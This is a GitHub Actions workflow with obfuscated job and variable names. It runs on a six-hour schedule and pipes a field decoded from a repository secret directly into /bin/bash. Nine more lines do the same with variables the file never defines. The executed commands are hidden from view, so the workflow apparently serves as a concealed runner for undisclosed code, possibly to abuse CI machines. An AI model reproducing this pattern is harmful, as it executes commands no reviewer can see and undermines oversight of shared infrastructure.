name: baiqiangda4390

on:
  workflow_dispatch:
  schedule:
    - cron: '26 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: baiqiangda4390
        env:
          oefp04: ${{ secrets.oefp04 }}
        run: |
          echo $oefp04 | jq -r .t74 | /bin/bash
          echo $h62352 | jq -r .hfjb63 | /bin/bash
          echo $k27 | jq -r .snkoj7 | /bin/bash
          echo $hnqy5561 | jq -r .phzop77147 | /bin/bash
          echo $xha7096 | jq -r .gn685 | /bin/bash
          echo $fzxx3489 | jq -r .nbofh9725 | /bin/bash
          echo $q16 | jq -r .ozz236 | /bin/bash
          echo $chps50 | jq -r .cx5 | /bin/bash
          echo $lr75 | jq -r .vmvb0 | /bin/bash
          echo $pmv2 | jq -r .ob043 | /bin/bash

